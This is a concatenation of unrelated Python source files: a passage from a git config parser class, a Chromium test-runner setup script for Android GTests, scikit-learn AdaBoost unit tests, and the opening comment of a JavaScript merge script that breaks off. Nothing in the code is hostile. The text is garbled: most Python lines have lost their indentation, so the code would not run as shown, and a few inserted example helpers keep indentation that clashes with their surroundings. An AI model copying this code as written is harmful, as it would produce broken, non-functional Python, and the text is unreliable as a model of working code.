if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# is it a section header?
mo = self.SECTCRE.match(line.strip())
if not is_multi_line and mo:
sectname = mo.group('header').strip()
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == cp.DEFAULTSECT:
cursect = self._defaults
else:
cursect = self._dict((('__name__', sectname),))
self._sections[sectname] = cursect
self._proxies[sectname] = None
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise cp.MissingSectionHeaderError(fpname, lineno, line)
# an option line?
elif not is_multi_line:
mo = self.OPTCRE.match(line)
if mo:
# We might just have handled the last line, which could contain a quotation we want to remove
optname, vi, optval = mo.group('option', 'vi', 'value')
if vi in ('=', ':') and ';' in optval and not optval.strip().startswith('"'):
pos = optval.find(';')
if pos != -1 and optval[pos - 1].isspace():
optval = optval[:pos]
optval = optval.strip()
if optval == '""':
optval = ''
# end handle empty string
optname = self.optionxform(optname.rstrip())
if len(optval) > 1 and optval[0] == '"' and optval[-1] != '"':
is_multi_line = True
optval = string_decode(optval[1:])
# end handle multi-line
cursect[optname] = optval
else:
# check if it's an option with no value - it's just ignored by git
if not self.OPTVALUEONLY.match(line):
if not e:
e = cp.ParsingError(fpname)
e.append(lineno, repr(line))
continue
else:
line = line.rstrip()
if line.endswith('"'):
is_multi_line = False
line = line[:-1]
# end handle quotations
cursect[optname] += string_decode(line)
# END parse section or option
# END while reading
# if any parsing errors occurred, raise an exception
if e:
raise e
def _has_includes(self):
return self._merge_includes and self.has_section('include')
def read(self):
"""Reads the data stored in the files we have been initialized with. It will
ignore files that cannot be read, possibly leaving an empty configuration
:return: Nothing
:raise IOError: if a file cannot be handled"""
if self._is_initialized:
return
self._is_initialized = True
if not isinstance(self._file_or_files, (tuple, list)):
files_to_read = [self._file_or_files]
else:
files_to_read = list(self._file_or_files)
# end assure we have a copy of the paths to handle
seen = set(files_to_read)
num_read_include_files = 0
while files_to_read:
file_path = files_to_read.pop(0)
fp = file_path
file_ok = False
if hasattr(fp, "seek"):
self._read(fp, fp.name)
else:
# assume a path if it is not a file-object
try:
with open(file_path, 'rb') as fp:
file_ok = True
self._read(fp, fp.name)
except IOError:
continue
# Read includes and append those that we didn't handle yet
# We expect all paths to be normalized and absolute (and will assure that is the case)
if self._has_includes():
for _, include_path in self.items('include'):
if include_path.startswith('~'):
include_path = osp.expanduser(include_path)
if not osp.isabs(include_path):
if not file_ok:
continue
# end ignore relative paths if we don't know the configuration file path
assert osp.isabs(file_path), "Need absolute paths to be sure our cycle checks will work"
include_path = osp.join(osp.dirname(file_path), include_path)
# end make include path absolute
include_path = osp.normpath(include_path)
if include_path in seen or not os.access(include_path, os.R_OK):
continue
seen.add(include_path)
files_to_read.append(include_path)
num_read_include_files += 1
# each include path in configuration file
# end handle includes
# END for each file object to read
# If there was no file included, we can safely write back (potentially) the configuration file
# without altering its meaning
if num_read_include_files == 0:
self._merge_includes = False
# end
def _write(self, fp):
"""Write an .ini-format representation of the configuration state in
git compatible format"""
def write_section(name, section_dict):
fp.write(("[%s]\n" % name).encode(defenc))
for (key, value) in section_dict.items():
if key != "__name__":
fp.write(("\t%s = %s\n" % (key, self._value_to_string(value).replace('\n', '\n\t'))).encode(defenc))
# END if key is not __name__
# END section writing
if self._defaults:
write_section(cp.DEFAULTSECT, self._defaults)
for name, value in self._sections.items():
write_section(name, value)
def items(self, section_name):
""":return: list((option, value), ...) pairs of all items in the given section"""
return [(k, v) for k, v in super(GitConfigParser, self).items(section_name) if k != '__name__']
@needs_values
def write(self):
"""Write changes to our file, if there are changes at all
:raise IOError: if this is a read-only writer instance or if we could not obtain
a file lock"""
self._assure_writable("write")
if not self._dirty:
return
if isinstance(self._file_or_files, (list, tuple)):
raise AssertionError("Cannot write back if there is not exactly a single file to write to, have %i files"
% len(self._file_or_files))
# end assert multiple files
if self._has_includes():
log.debug("Skipping write-back of configuration file as include files were merged in." +
"Set merge_includes=False to prevent this.")
return
# end
fp = self._file_or_files
# we have a physical file on disk, so get a lock
is_file_lock = isinstance(fp, string_types + (FileType, ))
if is_file_lock:
self._lock._obtain_lock()
if not hasattr(fp, "seek"):
with open(self._file_or_files, "wb") as fp:
self._write(fp)
else:
fp.seek(0)
# make sure we do not overwrite into an existing file
if hasattr(fp, 'truncate'):
fp.truncate()
self._write(fp)
def _assure_writable(self, method_name):
if self.read_only:
raise IOError("Cannot execute non-constant method %s.%s" % (self, method_name))
def add_section(self, section):
"""Assures added options will stay in order"""
return super(GitConfigParser, self).add_section(section)
@property
def read_only(self):
""":return: True if this instance may change the configuration file"""
return self._read_only
def get_value(self, section, option, default=None):
"""
:param default:
If not None, the given default value will be returned in case
the option did not exist
:return: a properly typed value, either int, float or string
:raise TypeError: in case the value could not be understood
Otherwise the exceptions known to the ConfigParser will be raised."""
try:
valuestr = self.get(section, option)
except Exception:
if default is not None:
return default
raise
types = (int, float)
for numtype in types:
try:
val = numtype(valuestr)
# truncated value ?
if val != float(valuestr):
continue
return val
except (ValueError, TypeError):
continue
# END for each numeric type
# try boolean values as git uses them
vl = valuestr.lower()
if vl == 'false':
return False
if vl == 'true':
return True
if not isinstance(valuestr, string_types):
raise TypeError("Invalid value type: only int, long, float and str are allowed", valuestr)
return valuestr
def _value_to_string(self, value):
if isinstance(value, (int, float, bool)):
return str(value)
return force_text(value)
@needs_values
@set_dirty_and_flush_changes
def set_value(self, section, option, value):
"""Sets the given option in section to the given value.
It will create the section if required, and will not throw as opposed to the default
ConfigParser 'set' method.
:param section: Name of the section in which the option resides or should reside
:param option: Name of the options whose value to set
:param value: Value to set the option to. It must be a string or convertible
to a string
:return: this instance"""
if not self.has_section(section):
self.add_section(section)
self.set(section, option, self._value_to_string(value))
return self
def rename_section(self, section, new_name):
"""rename the given section to new_name
:raise ValueError: if section doesn't exist
:raise ValueError: if a section with new_name does already exist
:return: this instance
"""
if not self.has_section(section):
raise ValueError("Source section '%s' doesn't exist" % section)
if self.has_section(new_name):
raise ValueError("Destination section '%s' already exists" % new_name)
super(GitConfigParser, self).add_section(new_name)
for k, v in self.items(section):
self.set(new_name, k, self._value_to_string(v))
# end for each value to copy
# This call writes back the changes, which is why we don't have the respective decorator
self.remove_section(section)
return self
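# Hedged write example: a non-read-only parser locks the file on construction
# and, when used as a context manager, flushes pending changes on release.
# The path below is illustrative only.
def _example_write_value(path='/tmp/example.gitconfig'):
    with GitConfigParser(path, read_only=False) as writer:
        writer.set_value('user', 'name', 'Example User')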
|
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates test runner factory and tests for GTests."""
import fnmatch
import glob
import logging
import os
import shutil
import sys
from pylib import android_commands
from pylib import cmd_helper
from pylib import constants
from pylib import ports
import test_package_apk
import test_package_exe
import test_runner
sys.path.insert(0,
os.path.join(constants.DIR_SOURCE_ROOT, 'build', 'util', 'lib',
'common'))
import unittest_util
_ISOLATE_FILE_PATHS = {
'base_unittests': 'base/base_unittests.isolate',
'breakpad_unittests': 'breakpad/breakpad_unittests.isolate',
'cc_perftests': 'cc/cc_perftests.isolate',
'components_unittests': 'components/components_unittests.isolate',
'content_browsertests': 'content/content_browsertests.isolate',
'content_unittests': 'content/content_unittests.isolate',
'media_unittests': 'media/media_unittests.isolate',
'net_unittests': 'net/net_unittests.isolate',
'ui_unittests': 'ui/ui_unittests.isolate',
'unit_tests': 'chrome/unit_tests.isolate',
'webkit_unit_tests':
'third_party/WebKit/Source/web/WebKitUnitTests.isolate',
}
# Paths relative to third_party/webrtc/ (kept separate for readability).
_WEBRTC_ISOLATE_FILE_PATHS = {
'audio_decoder_unittests':
'modules/audio_coding/neteq4/audio_decoder_unittests.isolate',
'common_audio_unittests': 'common_audio/common_audio_unittests.isolate',
'common_video_unittests': 'common_video/common_video_unittests.isolate',
'metrics_unittests': 'test/metrics_unittests.isolate',
'modules_tests': 'modules/modules_tests.isolate',
'modules_unittests': 'modules/modules_unittests.isolate',
'neteq_unittests': 'modules/audio_coding/neteq/neteq_unittests.isolate',
'system_wrappers_unittests':
'system_wrappers/source/system_wrappers_unittests.isolate',
'test_support_unittests': 'test/test_support_unittests.isolate',
'tools_unittests': 'tools/tools_unittests.isolate',
'video_engine_core_unittests':
'video_engine/video_engine_core_unittests.isolate',
'voice_engine_unittests': 'voice_engine/voice_engine_unittests.isolate',
}
# Append the WebRTC tests with the full path from Chromium's src/ root.
for test,isolate_path in _WEBRTC_ISOLATE_FILE_PATHS.items():
_ISOLATE_FILE_PATHS[test] = 'third_party/webrtc/%s' % isolate_path
# Used for filtering large data deps at a finer grain than what's allowed in
# isolate files since pushing deps to devices is expensive.
# Wildcards are allowed.
_DEPS_EXCLUSION_LIST = [
'chrome/test/data/extensions/api_test',
'chrome/test/data/extensions/secure_shell',
'chrome/test/data/firefox*',
'chrome/test/data/gpu',
'chrome/test/data/image_decoding',
'chrome/test/data/import',
'chrome/test/data/page_cycler',
'chrome/test/data/perf',
'chrome/test/data/pyauto_private',
'chrome/test/data/safari_import',
'chrome/test/data/scroll',
'chrome/test/data/third_party',
'third_party/hunspell_dictionaries/*.dic',
# crbug.com/258690
'webkit/data/bmp_decoder',
'webkit/data/ico_decoder',
]
_ISOLATE_SCRIPT = os.path.join(
constants.DIR_SOURCE_ROOT, 'tools', 'swarm_client', 'isolate.py')
def _GenerateDepsDirUsingIsolate(suite_name):
"""Generate the dependency dir for the test suite using isolate.
Args:
suite_name: Name of the test suite (e.g. base_unittests).
"""
if os.path.isdir(constants.ISOLATE_DEPS_DIR):
shutil.rmtree(constants.ISOLATE_DEPS_DIR)
isolate_rel_path = _ISOLATE_FILE_PATHS.get(suite_name)
if not isolate_rel_path:
logging.info('Did not find an isolate file for the test suite.')
return
isolate_abs_path = os.path.join(constants.DIR_SOURCE_ROOT, isolate_rel_path)
isolated_abs_path = os.path.join(
constants.GetOutDirectory(), '%s.isolated' % suite_name)
assert os.path.exists(isolate_abs_path)
isolate_cmd = [
'python', _ISOLATE_SCRIPT,
'remap',
'--isolate', isolate_abs_path,
'--isolated', isolated_abs_path,
'-V', 'PRODUCT_DIR=%s' % constants.GetOutDirectory(),
'-V', 'OS=android',
'--outdir', constants.ISOLATE_DEPS_DIR,
]
assert not cmd_helper.RunCmd(isolate_cmd)
# We're relying on the fact that timestamps are preserved
# by the remap command (hardlinked). Otherwise, all the data
# will be pushed to the device once we move to using time diff
# instead of md5sum. Perform a sanity check here.
for root, _, filenames in os.walk(constants.ISOLATE_DEPS_DIR):
if filenames:
linked_file = os.path.join(root, filenames[0])
orig_file = os.path.join(
constants.DIR_SOURCE_ROOT,
os.path.relpath(linked_file, constants.ISOLATE_DEPS_DIR))
if os.stat(linked_file).st_ino == os.stat(orig_file).st_ino:
break
else:
raise Exception('isolate remap command did not use hardlinks.')
# Delete excluded files as defined by _DEPS_EXCLUSION_LIST.
old_cwd = os.getcwd()
try:
os.chdir(constants.ISOLATE_DEPS_DIR)
excluded_paths = [x for y in _DEPS_EXCLUSION_LIST for x in glob.glob(y)]
if excluded_paths:
logging.info('Excluding the following from dependency list: %s',
excluded_paths)
for p in excluded_paths:
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.remove(p)
finally:
os.chdir(old_cwd)
# On Android, all pak files need to be in the top-level 'paks' directory.
paks_dir = os.path.join(constants.ISOLATE_DEPS_DIR, 'paks')
os.mkdir(paks_dir)
for root, _, filenames in os.walk(os.path.join(constants.ISOLATE_DEPS_DIR,
'out')):
for filename in fnmatch.filter(filenames, '*.pak'):
shutil.move(os.path.join(root, filename), paks_dir)
# Move everything in PRODUCT_DIR to top level.
deps_product_dir = os.path.join(constants.ISOLATE_DEPS_DIR, 'out',
constants.GetBuildType())
if os.path.isdir(deps_product_dir):
for p in os.listdir(deps_product_dir):
shutil.move(os.path.join(deps_product_dir, p), constants.ISOLATE_DEPS_DIR)
os.rmdir(deps_product_dir)
os.rmdir(os.path.join(constants.ISOLATE_DEPS_DIR, 'out'))
def _GetDisabledTestsFilterFromFile(suite_name):
"""Returns a gtest filter based on the *_disabled file.
Args:
suite_name: Name of the test suite (e.g. base_unittests).
Returns:
A gtest filter which excludes disabled tests.
Example: '*-StackTrace.*:StringPrintfTest.StringPrintfMisc'
"""
filter_file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'filter', '%s_disabled' % suite_name)
if not filter_file_path or not os.path.exists(filter_file_path):
logging.info('No filter file found at %s', filter_file_path)
return '*'
filters = [x for x in [x.strip() for x in file(filter_file_path).readlines()]
if x and x[0] != '#']
disabled_filter = '*-%s' % ':'.join(filters)
logging.info('Applying filter "%s" obtained from %s',
disabled_filter, filter_file_path)
return disabled_filter
def _GetTestsFromDevice(runner_factory, devices):
"""Get a list of tests from a device.
Args:
runner_factory: Callable that takes device and shard_index and returns
a TestRunner.
devices: A list of device ids.
Returns:
All the tests in the test suite.
"""
for device in devices:
try:
logging.info('Obtaining tests from %s', device)
return runner_factory(device, 0).GetAllTests()
except (android_commands.errors.WaitForResponseTimedOutError,
android_commands.errors.DeviceUnresponsiveError), e:
logging.warning('Failed obtaining tests from %s with exception: %s',
device, e)
raise Exception('No device available to get the list of tests.')
def _FilterTestsUsingPrefixes(all_tests, pre=False, manual=False):
"""Removes tests with disabled prefixes.
Args:
all_tests: List of tests to filter.
pre: If True, include tests with PRE_ prefix.
manual: If True, include tests with MANUAL_ prefix.
Returns:
List of tests remaining.
"""
filtered_tests = []
filter_prefixes = ['DISABLED_', 'FLAKY_', 'FAILS_']
if not pre:
filter_prefixes.append('PRE_')
if not manual:
filter_prefixes.append('MANUAL_')
for t in all_tests:
test_case, test = t.split('.', 1)
if not any([test_case.startswith(prefix) or test.startswith(prefix) for
prefix in filter_prefixes]):
filtered_tests.append(t)
return filtered_tests
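# Worked example for the prefix filtering above (a sketch, not used by the
# harness): DISABLED_/FLAKY_/FAILS_ tests are always dropped, while PRE_
# tests survive only when explicitly requested.
def _ExamplePrefixFiltering():
  tests = ['Suite.Test', 'Suite.DISABLED_Test', 'Suite.PRE_Test']
  return (_FilterTestsUsingPrefixes(tests),            # ['Suite.Test']
          _FilterTestsUsingPrefixes(tests, pre=True))  # adds 'Suite.PRE_Test'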
def _FilterDisabledTests(tests, suite_name, has_gtest_filter):
"""Removes disabled tests from |tests|.
Applies the following filters in order:
1. Remove tests with disabled prefixes.
2. Remove tests specified in the *_disabled files in the 'filter' dir
Args:
tests: List of tests.
suite_name: Name of the test suite (e.g. base_unittests).
has_gtest_filter: Whether a gtest_filter is provided.
Returns:
List of tests remaining.
"""
tests = _FilterTestsUsingPrefixes(
tests, has_gtest_filter, has_gtest_filter)
tests = unittest_util.FilterTestNames(
tests, _GetDisabledTestsFilterFromFile(suite_name))
return tests
def Setup(test_options, devices):
"""Create the test runner factory and tests.
Args:
test_options: A GTestOptions object.
devices: A list of attached devices.
Returns:
A tuple of (TestRunnerFactory, tests).
"""
if not ports.ResetTestServerPortAllocation():
raise Exception('Failed to reset test server port.')
test_package = test_package_apk.TestPackageApk(test_options.suite_name)
if not os.path.exists(test_package.suite_path):
test_package = test_package_exe.TestPackageExecutable(
test_options.suite_name)
if not os.path.exists(test_package.suite_path):
raise Exception(
'Did not find %s target. Ensure it has been built.'
% test_options.suite_name)
logging.warning('Found target %s', test_package.suite_path)
_GenerateDepsDirUsingIsolate(test_options.suite_name)
# Constructs a new TestRunner with the current options.
def TestRunnerFactory(device, shard_index):
return test_runner.TestRunner(
test_options,
device,
test_package)
tests = _GetTestsFromDevice(TestRunnerFactory, devices)
if test_options.run_disabled:
test_options = test_options._replace(
test_arguments=('%s --gtest_also_run_disabled_tests' %
test_options.test_arguments))
else:
tests = _FilterDisabledTests(tests, test_options.suite_name,
bool(test_options.gtest_filter))
if test_options.gtest_filter:
tests = unittest_util.FilterTestNames(tests, test_options.gtest_filter)
# Coalesce unit tests into a single test per device
if test_options.suite_name != 'content_browsertests':
num_devices = len(devices)
tests = [':'.join(tests[i::num_devices]) for i in xrange(num_devices)]
tests = [t for t in tests if t]
return (TestRunnerFactory, tests)
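# Worked example of the per-device coalescing in Setup above (a sketch, not
# called anywhere): with two devices, every other test lands in the same
# colon-joined chunk, e.g. ['A.a', 'B.b', 'C.c'] -> ['A.a:C.c', 'B.b'].
def _ExampleCoalesceTests(tests, num_devices):
  chunks = [':'.join(tests[i::num_devices]) for i in xrange(num_devices)]
  return [t for t in chunks if t]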
|
|
"""Testing for the boost module (sklearn.ensemble.boost)."""
import numpy as np
from sklearn.utils.testing import assert_array_equal, assert_array_less
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal, assert_true
from sklearn.utils.testing import assert_raises, assert_raises_regexp
from sklearn.cross_validation import train_test_split
from sklearn.grid_search import GridSearchCV
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import AdaBoostRegressor
from sklearn.ensemble import weight_boosting
from scipy.sparse import csc_matrix
from scipy.sparse import csr_matrix
from scipy.sparse import coo_matrix
from scipy.sparse import dok_matrix
from scipy.sparse import lil_matrix
from sklearn.svm import SVC, SVR
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.utils import shuffle
from sklearn import datasets
# Common random state
rng = np.random.RandomState(0)
# Toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y_class = ["foo", "foo", "foo", 1, 1, 1] # test string class labels
y_regr = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
y_t_class = ["foo", 1, 1]
y_t_regr = [-1, 1, 1]
# Load the iris dataset and randomly permute it
iris = datasets.load_iris()
perm = rng.permutation(iris.target.size)
iris.data, iris.target = shuffle(iris.data, iris.target, random_state=rng)
# Load the boston dataset and randomly permute it
boston = datasets.load_boston()
boston.data, boston.target = shuffle(boston.data, boston.target,
random_state=rng)
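# Minimal AdaBoost sketch (not itself a test): fit the toy classification
# sample defined above and predict on T. The tests below exercise the same
# API far more thoroughly.
def _example_adaboost_fit():
    clf = AdaBoostClassifier(n_estimators=10, random_state=0)
    clf.fit(X, y_class)
    return clf.predict(T)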
def test_samme_proba():
# Test the `_samme_proba` helper function.
# Define some example (bad) `predict_proba` output.
probs = np.array([[1, 1e-6, 0],
[0.19, 0.6, 0.2],
[-999, 0.51, 0.5],
[1e-6, 1, 1e-9]])
probs /= np.abs(probs.sum(axis=1))[:, np.newaxis]
# _samme_proba calls estimator.predict_proba.
# Make a mock object so I can control what gets returned.
class MockEstimator(object):
def predict_proba(self, X):
assert_array_equal(X.shape, probs.shape)
return probs
mock = MockEstimator()
samme_proba = weight_boosting._samme_proba(mock, 3, np.ones_like(probs))
assert_array_equal(samme_proba.shape, probs.shape)
assert_true(np.isfinite(samme_proba).all())
# Make sure that the correct elements come out as smallest --
# `_samme_proba` should preserve the ordering in each example.
assert_array_equal(np.argmin(samme_proba, axis=1), [2, 0, 0, 2])
assert_array_equal(np.argmax(samme_proba, axis=1), [0, 1, 1, 1])
def test_classification_toy():
# Check classification on a toy dataset.
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg, random_state=0)
clf.fit(X, y_class)
assert_array_equal(clf.predict(T), y_t_class)
assert_array_equal(np.unique(np.asarray(y_t_class)), clf.classes_)
assert_equal(clf.predict_proba(T).shape, (len(T), 2))
assert_equal(clf.decision_function(T).shape, (len(T),))
def test_regression_toy():
# Check regression on a toy dataset.
clf = AdaBoostRegressor(random_state=0)
clf.fit(X, y_regr)
assert_array_equal(clf.predict(T), y_t_regr)
def test_iris():
# Check consistency on dataset iris.
classes = np.unique(iris.target)
clf_samme = prob_samme = None
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg)
clf.fit(iris.data, iris.target)
assert_array_equal(classes, clf.classes_)
proba = clf.predict_proba(iris.data)
if alg == "SAMME":
clf_samme = clf
prob_samme = proba
assert_equal(proba.shape[1], len(classes))
assert_equal(clf.decision_function(iris.data).shape[1], len(classes))
score = clf.score(iris.data, iris.target)
assert score > 0.9, "Failed with algorithm %s and score = %f" % \
(alg, score)
# Somewhat hacky regression test: prior to
# ae7adc880d624615a34bafdb1d75ef67051b8200,
# predict_proba returned SAMME.R values for SAMME.
clf_samme.algorithm = "SAMME.R"
assert_array_less(0,
np.abs(clf_samme.predict_proba(iris.data) - prob_samme))
def test_boston():
# Check consistency on dataset boston house prices.
clf = AdaBoostRegressor(random_state=0)
clf.fit(boston.data, boston.target)
score = clf.score(boston.data, boston.target)
assert score > 0.85
def test_staged_predict():
# Check staged predictions.
rng = np.random.RandomState(0)
iris_weights = rng.randint(10, size=iris.target.shape)
boston_weights = rng.randint(10, size=boston.target.shape)
# AdaBoost classification
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg, n_estimators=10)
clf.fit(iris.data, iris.target, sample_weight=iris_weights)
predictions = clf.predict(iris.data)
staged_predictions = [p for p in clf.staged_predict(iris.data)]
proba = clf.predict_proba(iris.data)
staged_probas = [p for p in clf.staged_predict_proba(iris.data)]
score = clf.score(iris.data, iris.target, sample_weight=iris_weights)
staged_scores = [
s for s in clf.staged_score(
iris.data, iris.target, sample_weight=iris_weights)]
assert_equal(len(staged_predictions), 10)
assert_array_almost_equal(predictions, staged_predictions[-1])
assert_equal(len(staged_probas), 10)
assert_array_almost_equal(proba, staged_probas[-1])
assert_equal(len(staged_scores), 10)
assert_array_almost_equal(score, staged_scores[-1])
# AdaBoost regression
clf = AdaBoostRegressor(n_estimators=10, random_state=0)
clf.fit(boston.data, boston.target, sample_weight=boston_weights)
predictions = clf.predict(boston.data)
staged_predictions = [p for p in clf.staged_predict(boston.data)]
score = clf.score(boston.data, boston.target, sample_weight=boston_weights)
staged_scores = [
s for s in clf.staged_score(
boston.data, boston.target, sample_weight=boston_weights)]
assert_equal(len(staged_predictions), 10)
assert_array_almost_equal(predictions, staged_predictions[-1])
assert_equal(len(staged_scores), 10)
assert_array_almost_equal(score, staged_scores[-1])
def test_gridsearch():
# Check that base trees can be grid-searched.
# AdaBoost classification
boost = AdaBoostClassifier(base_estimator=DecisionTreeClassifier())
parameters = {'n_estimators': (1, 2),
'base_estimator__max_depth': (1, 2),
'algorithm': ('SAMME', 'SAMME.R')}
clf = GridSearchCV(boost, parameters)
clf.fit(iris.data, iris.target)
# AdaBoost regression
boost = AdaBoostRegressor(base_estimator=DecisionTreeRegressor(),
random_state=0)
parameters = {'n_estimators': (1, 2),
'base_estimator__max_depth': (1, 2)}
clf = GridSearchCV(boost, parameters)
clf.fit(boston.data, boston.target)
def test_pickle():
# Check pickability.
import pickle
# Adaboost classifier
for alg in ['SAMME', 'SAMME.R']:
obj = AdaBoostClassifier(algorithm=alg)
obj.fit(iris.data, iris.target)
score = obj.score(iris.data, iris.target)
s = pickle.dumps(obj)
obj2 = pickle.loads(s)
assert_equal(type(obj2), obj.__class__)
score2 = obj2.score(iris.data, iris.target)
assert_equal(score, score2)
# Adaboost regressor
obj = AdaBoostRegressor(random_state=0)
obj.fit(boston.data, boston.target)
score = obj.score(boston.data, boston.target)
s = pickle.dumps(obj)
obj2 = pickle.loads(s)
assert_equal(type(obj2), obj.__class__)
score2 = obj2.score(boston.data, boston.target)
assert_equal(score, score2)
def test_importances():
# Check variable importances.
X, y = datasets.make_classification(n_samples=2000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
shuffle=False,
random_state=1)
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg)
clf.fit(X, y)
importances = clf.feature_importances_
assert_equal(importances.shape[0], 10)
assert_equal((importances[:3, np.newaxis] >= importances[3:]).all(),
True)
def test_error():
# Test that it gives proper exception on deficient input.
assert_raises(ValueError,
AdaBoostClassifier(learning_rate=-1).fit,
X, y_class)
assert_raises(ValueError,
AdaBoostClassifier(algorithm="foo").fit,
X, y_class)
assert_raises(ValueError,
AdaBoostClassifier().fit,
X, y_class, sample_weight=np.asarray([-1]))
def test_base_estimator():
# Test different base estimators.
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
# XXX doesn't work with y_class because RF doesn't support classes_
# Shouldn't AdaBoost run a LabelBinarizer?
clf = AdaBoostClassifier(RandomForestClassifier())
clf.fit(X, y_regr)
clf = AdaBoostClassifier(SVC(), algorithm="SAMME")
clf.fit(X, y_class)
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR
clf = AdaBoostRegressor(RandomForestRegressor(), random_state=0)
clf.fit(X, y_regr)
clf = AdaBoostRegressor(SVR(), random_state=0)
clf.fit(X, y_regr)
# Check that an empty discrete ensemble fails in fit, not predict.
X_fail = [[1, 1], [1, 1], [1, 1], [1, 1]]
y_fail = ["foo", "bar", 1, 2]
clf = AdaBoostClassifier(SVC(), algorithm="SAMME")
assert_raises_regexp(ValueError, "worse than random",
clf.fit, X_fail, y_fail)
def test_sample_weight_missing():
from sklearn.linear_model import LinearRegression
from sklearn.cluster import KMeans
clf = AdaBoostClassifier(LinearRegression(), algorithm="SAMME")
assert_raises(ValueError, clf.fit, X, y_regr)
clf = AdaBoostRegressor(LinearRegression())
assert_raises(ValueError, clf.fit, X, y_regr)
clf = AdaBoostClassifier(KMeans(), algorithm="SAMME")
assert_raises(ValueError, clf.fit, X, y_regr)
clf = AdaBoostRegressor(KMeans())
assert_raises(ValueError, clf.fit, X, y_regr)
def test_sparse_classification():
# Check classification with sparse input.
class CustomSVC(SVC):
"""SVC variant that records the nature of the training set."""
def fit(self, X, y, sample_weight=None):
"""Modification on fit caries data type for later verification."""
super(CustomSVC, self).fit(X, y, sample_weight=sample_weight)
self.data_type_ = type(X)
return self
X, y = datasets.make_multilabel_classification(n_classes=1, n_samples=15,
n_features=5,
return_indicator=True,
random_state=42)
# Flatten y to a 1d array
y = np.ravel(y)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
for sparse_format in [csc_matrix, csr_matrix, lil_matrix, coo_matrix,
dok_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
# Trained on sparse format
sparse_classifier = AdaBoostClassifier(
base_estimator=CustomSVC(probability=True),
random_state=1,
algorithm="SAMME"
).fit(X_train_sparse, y_train)
# Trained on dense format
dense_classifier = AdaBoostClassifier(
base_estimator=CustomSVC(probability=True),
random_state=1,
algorithm="SAMME"
).fit(X_train, y_train)
# predict
sparse_results = sparse_classifier.predict(X_test_sparse)
dense_results = dense_classifier.predict(X_test)
assert_array_equal(sparse_results, dense_results)
# decision_function
sparse_results = sparse_classifier.decision_function(X_test_sparse)
dense_results = dense_classifier.decision_function(X_test)
assert_array_equal(sparse_results, dense_results)
# predict_log_proba
sparse_results = sparse_classifier.predict_log_proba(X_test_sparse)
dense_results = dense_classifier.predict_log_proba(X_test)
assert_array_equal(sparse_results, dense_results)
# predict_proba
sparse_results = sparse_classifier.predict_proba(X_test_sparse)
dense_results = dense_classifier.predict_proba(X_test)
assert_array_equal(sparse_results, dense_results)
# score
sparse_results = sparse_classifier.score(X_test_sparse, y_test)
dense_results = dense_classifier.score(X_test, y_test)
assert_array_equal(sparse_results, dense_results)
# staged_decision_function
sparse_results = sparse_classifier.staged_decision_function(
X_test_sparse)
dense_results = dense_classifier.staged_decision_function(X_test)
for sparse_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sparse_res, dense_res)
# staged_predict
sparse_results = sparse_classifier.staged_predict(X_test_sparse)
dense_results = dense_classifier.staged_predict(X_test)
for sparse_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sparse_res, dense_res)
# staged_predict_proba
sparse_results = sparse_classifier.staged_predict_proba(X_test_sparse)
dense_results = dense_classifier.staged_predict_proba(X_test)
for sparse_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sparse_res, dense_res)
# staged_score
sparse_results = sparse_classifier.staged_score(X_test_sparse,
y_test)
dense_results = dense_classifier.staged_score(X_test, y_test)
for sparse_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sparse_res, dense_res)
# Verify sparsity of data is maintained during training
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert all([(t == csc_matrix or t == csr_matrix)
for t in types])
def test_sparse_regression():
# Check regression with sparse input.
class CustomSVR(SVR):
"""SVR variant that records the nature of the training set."""
def fit(self, X, y, sample_weight=None):
"""Modification on fit caries data type for later verification."""
super(CustomSVR, self).fit(X, y, sample_weight=sample_weight)
self.data_type_ = type(X)
return self
X, y = datasets.make_regression(n_samples=15, n_features=50, n_targets=1,
random_state=42)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
for sparse_format in [csc_matrix, csr_matrix, lil_matrix, coo_matrix,
dok_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
# Trained on sparse format
sparse_classifier = AdaBoostRegressor(
base_estimator=CustomSVR(),
random_state=1
).fit(X_train_sparse, y_train)
# Trained on dense format
dense_classifier = AdaBoostRegressor(
base_estimator=CustomSVR(),
random_state=1
).fit(X_train, y_train)
# predict
sparse_results = sparse_classifier.predict(X_test_sparse)
dense_results = dense_classifier.predict(X_test)
assert_array_equal(sparse_results, dense_results)
# staged_predict
sparse_results = sparse_classifier.staged_predict(X_test_sparse)
dense_results = dense_classifier.staged_predict(X_test)
for sparse_res, dense_res in zip(sparse_results, dense_results):
assert_array_equal(sparse_res, dense_res)
types = [i.data_type_ for i in sparse_classifier.estimators_]
assert all([(t == csc_matrix or t == csr_matrix)
for t in types])
|
|
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
